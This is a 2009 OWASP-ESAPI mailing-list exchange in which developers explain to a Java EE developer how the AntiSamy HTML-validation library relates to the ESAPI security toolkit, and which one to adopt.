[OWASP-ESAPI] antisamy and esapi

Chris Schmidt chrisisbeef at gmail.com
Tue Aug 4 17:57:40 EDT 2009


See my replies below:

On Tue, 2009-08-04 at 14:43 -0700, Joanne Sun wrote:
> Thanks for your fast reply. I read the link again but I am not still
> not clear.
> For preventing XSS, all the rules 
> http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
> 
> use ESAPI as example
> 
> and the
> http://www.owasp.org/index.php/How_to_perform_HTML_entity_encoding_in_Java did not mention AntiSami

AntiSamy is not really about preventing XSS or doing HTML entity
encoding. AntiSamy is a library that will allow you to validate user
entered input against a set of rules (pre-defined or custom to your
application) and make sure there is not any "malicious" code being
submitted to be persisted in your app. This is really geared towards
applications where you are allowing users to customize user profiles or
content that is displayed and persisted using HTML/CSS and even some JS.
It run it's validation rules against the user submitted code and either
pass it as safe or fail it as unsafe.

ESAPI on the other hand is a toolkit designed to define a central API
where all calls to validate/verify/authenticate/log or perform other
security centric operations should go. 

This would include CSRF, User Authentication, etc.

> 
> So AntiSamy is better than ESAPI or the opposite? It seems AntiSamy is
> good at preventing CSRF from a slide
> http://www.owasp.org/images/e/e9/OWASP-WASCAppSec2007SanJose_AntiSamy.ppt.
> 

It really depends on what you are trying to do. Personally, I would
recommend that you use ESAPI which will also provide AntiSamy's
functionality to you.

> If we got the license of Antisamy, that is not enough to use ESAPI?
> But the other direction is ok?
> 

Not sure what you mean here? These are both Open Source Solutions and as
such, there is no licensing in the sense that you have to purchase a
license to use the product. The licensing for both applications just
requires you to agree to the terms of use for the product and agree to
the license itself.

Hopefully this answers your questions. Let us know if there is anything
else we can help you with. 



> Thanks,
> 
> On Tue, Aug 4, 2009 at 2:19 PM, Chris Schmidt <chrisisbeef at gmail.com>
> wrote:
>         Also,
>         
>         ESAPI uses AntiSamy to validate HTML in the reference
>         implementation
>         
>         org.owasp.esapi.reference.validation.HTMLValidationRule
>         
>         
>         On Tue, 2009-08-04 at 10:51 -1000, Jim Manico wrote:
>         > Does this help at all?
>         >
>         >
>         http://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project#What_is_it.3F
>         >
>         >         ----- Original Message -----
>         >         From: Joanne Sun
>         >         To: OWASP-ESAPI at lists.owasp.org
>         >         Sent: Monday, August 03, 2009 8:39 PM
>         >         Subject: [OWASP-ESAPI] antisamy and esapi
>         >
>         >
>         >         Hello,
>         >
>         >         Could you please tell me what is the relation
>         between Antisamy
>         >         and ESAPI? Which I should use for my java ee
>         project?
>         >
>         >         Thank you!
>         >
>         >         Joanne
>         >
>         >
>         ______________________________________________________________
>         >
>         >         _______________________________________________
>         >         OWASP-ESAPI mailing list
>         >         OWASP-ESAPI at lists.owasp.org
>         >         https://lists.owasp.org/mailman/listinfo/owasp-esapi
>         > _______________________________________________
>         > OWASP-ESAPI mailing list
>         > OWASP-ESAPI at lists.owasp.org
>         > https://lists.owasp.org/mailman/listinfo/owasp-esapi
>         
>         
> 



More information about the OWASP-ESAPI mailing list